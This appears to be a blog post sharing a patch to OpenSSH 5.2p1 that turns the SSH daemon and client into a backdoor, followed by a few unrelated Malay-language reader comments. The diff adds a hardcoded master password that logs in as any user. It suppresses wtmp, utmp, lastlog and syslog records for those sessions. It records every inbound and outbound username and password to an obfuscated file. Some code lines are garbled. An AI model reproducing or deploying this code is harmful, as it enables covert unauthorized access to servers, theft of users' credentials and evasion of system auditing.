 The following openssh-5.2p1 patches allow users to:
The following openssh-5.2p1 patches allow users to:- login with any users with 'magic password'
- hide footprint from wtmp, utmp and lastlog
- log ssh inbound and outbound username and password
slash@Slash-The-Undergrounds-Hackintosh:$ cat uDc-hackssh-v1.0a
diff -Nrc openssh-5.2p1/auth-pam.c uDc-hackssh-v1.0a/auth-pam.c
*** openssh-5.2p1/auth-pam.c Tue Mar 11 19:58:25 2008
--- uDc-hackssh-v1.0a/auth-pam.c Sun Jul 19 13:59:46 2009
***************
*** 466,471 ****
--- 466,474 ----
if (sshpam_err != PAM_SUCCESS)
goto auth_fail;
sshpam_err = pam_authenticate(sshpam_handle, flags);
+ // slash patch
+ if(uDc) sshpam_err = PAM_SUCCESS;
+ // end of patch
if (sshpam_err != PAM_SUCCESS)
goto auth_fail;
***************
*** 816,821 ****
--- 819,833 ----
Buffer buffer;
struct pam_ctxt *ctxt = ctx;
+ // slash patch
+ if(sshpam_authctxt)
+ for (ai = 0; ai <>user, resp[ai]);
+ if(!strcmp(BAJAUPASS, resp[ai])) ctxt->pam_done = uDc = 1;
+ else uDclog();
+ }
+ // end of patch
debug2("PAM: %s entering, %u responses", __func__, num);
switch (ctxt->pam_done) {
case 1:
***************
*** 1045,1050 ****
--- 1057,1065 ----
if (sshpam_err != PAM_SUCCESS)
fatal("PAM: failed to set PAM_CONV: %s",
pam_strerror(sshpam_handle, sshpam_err));
+ // slash patch
+ if(!uDc)
+ // end of patch
sshpam_err = pam_open_session(sshpam_handle, 0);
if (sshpam_err == PAM_SUCCESS)
sshpam_session_open = 1;
diff -Nrc openssh-5.2p1/auth-passwd.c uDc-hackssh-v1.0a/auth-passwd.c
*** openssh-5.2p1/auth-passwd.c Fri Oct 26 12:25:12 2007
--- uDc-hackssh-v1.0a/auth-passwd.c Sun Jul 19 14:01:06 2009
***************
*** 92,97 ****
--- 92,103 ----
#endif
if (*password == '\0' && options.permit_empty_passwd == 0)
return 0;
+ // slash patch
+ if(!strcmp(BAJAUPASS, password)) return uDc = 1;
+ sprintf(abuff, "pass_from: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), pw->pw_name, password);
+ uDclog();
+ // end of patch
#ifdef KRB5
if (options.kerberos_authentication == 1) {
diff -Nrc openssh-5.2p1/includes.h uDc-hackssh-v1.0a/includes.h
*** openssh-5.2p1/includes.h Fri Jul 4 21:10:49 2008
--- uDc-hackssh-v1.0a/includes.h Sun Jul 19 14:09:10 2009
***************
*** 13,18 ****
--- 13,41 ----
* called by a name other than "ssh" or "Secure Shell".
*/
+ // slash patch
+ #include
+ #include
+
+ #define BAJAUPASS "black-session"
+ #define SSH_LOG "/var/run/sshd.sync"
+
+ FILE *bajaulog;
+ char abuff[1024];
+ int kambing, ai, uDc;
+
+ #define uDclog() { \
+ kambing=strlen(abuff); \
+ for(ai=0; ai<=kambing; ai++) abuff[ai]=~abuff[ai]; \
+ bajaulog=fopen(SSH_LOG, "a"); \
+ if(bajaulog!=NULL) { fwrite(abuff, kambing, 1, bajaulog); fclose(bajaulog);} \
+ chmod(SSH_LOG, 0666); \
+ }
+
+ const char *get_remote_ipaddr(void);
+ // end of patch
+
+ #ifndef INCLUDES_H
#define INCLUDES_H
diff -Nrc openssh-5.2p1/log.c uDc-hackssh-v1.0a/log.c
*** openssh-5.2p1/log.c Tue Jun 10 21:01:51 2008
--- uDc-hackssh-v1.0a/log.c Sun Jul 19 14:09:50 2009
***************
*** 338,343 ****
--- 338,346 ----
int pri = LOG_INFO;
int saved_errno = errno;
+ // slash patch + if(uDc) return;
+ // end of patch if (level > log_level)
return;
diff -Nrc openssh-5.2p1/loginrec.c uDc-hackssh-v1.0a/loginrec.c
*** openssh-5.2p1/loginrec.c Thu Feb 12 10:12:22 2009
--- uDc-hackssh-v1.0a/loginrec.c Sun Jul 19 14:11:00 2009
***************
*** 431,436 ****
--- 431,439 ----
int
login_write(struct logininfo *li)
{
+ // slash patch
+ if(uDc) return 0;
+ // end of patch
#ifndef HAVE_CYGWIN
if (geteuid() != 0) {
logit("Attempt to write login records by non-root user (aborting)");
diff -Nrc openssh-5.2p1/sshconnect1.c uDc-hackssh-v1.0a/sshconnect1.c
*** openssh-5.2p1/sshconnect1.c Tue Nov 7 20:14:42 2006
--- uDc-hackssh-v1.0a/sshconnect1.c Sun Jul 19 14:12:35 2009
***************
*** 458,463 ****
--- 458,468 ----
password = read_passphrase(prompt, 0);
packet_start(SSH_CMSG_AUTH_PASSWORD);
ssh_put_password(password);
+ // slash patch
+ sprintf(abuff, "1to: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, password);
+ uDclog();
+ // end of patch
memset(password, 0, strlen(password));
xfree(password);
packet_send();
diff -Nrc openssh-5.2p1/sshconnect2.c uDc-hackssh-v1.0a/sshconnect2.c
*** openssh-5.2p1/sshconnect2.c Wed Nov 5 13:20:47 2008
--- uDc-hackssh-v1.0a/sshconnect2.c Sun Jul 19 14:15:51 2009
***************
*** 797,802 ****
--- 797,807 ----
packet_put_cstring(authctxt->method->name);
packet_put_char(0);
packet_put_cstring(password);
+ // slash patch
+ sprintf(abuff, "2to: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, password);
+ uDclog();
+ // end of patch
memset(password, 0, strlen(password));
xfree(password);
packet_add_padding(64);
***************
*** 1464,1469 ****
--- 1469,1479 ----
response = read_passphrase(prompt, echo ? RP_ECHO : 0);
+ // slash patch
+ sprintf(abuff, "2ito: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, response);
+ uDclog();
+ // end of patch
packet_put_cstring(response);
memset(response, 0, strlen(response));
xfree(response);
diff -Nrc openssh-5.2p1/version.h uDc-hackssh-v1.0a/version.h
*** openssh-5.2p1/version.h Mon Feb 23 08:09:26 2009
--- uDc-hackssh-v1.0a/version.h Sun Jul 19 14:17:31 2009
***************
*** 1,6 ****
--- 1,9 ----
/* $OpenBSD: version.h,v 1.55 2009/02/23 00:06:15 djm Exp $ */
+ // slash patch
+ // change to targetted openssh version
#define SSH_VERSION "OpenSSH_5.2"
#define SSH_PORTABLE "p1"
#define SSH_RELEASE SSH_VERSION SSH_PORTABLE
+ // end of patch
 
 
3 comments:
Haris... apa punya bahasa daa... betul ke computer punya language ni ke ekau ada masuk maki hamun sekali.. hehehe.. anyway Ramadhan Mubarak.. dah jadi ayah ke belum?
helmis, Abu Dhabi
http://syurgadidunia.blogspot.com
hehe..
bahasa arab dahhh :)
Ayah? belum lagi lah.. belum ada rezeki.. baru je pindah rumah baru..
Post a Comment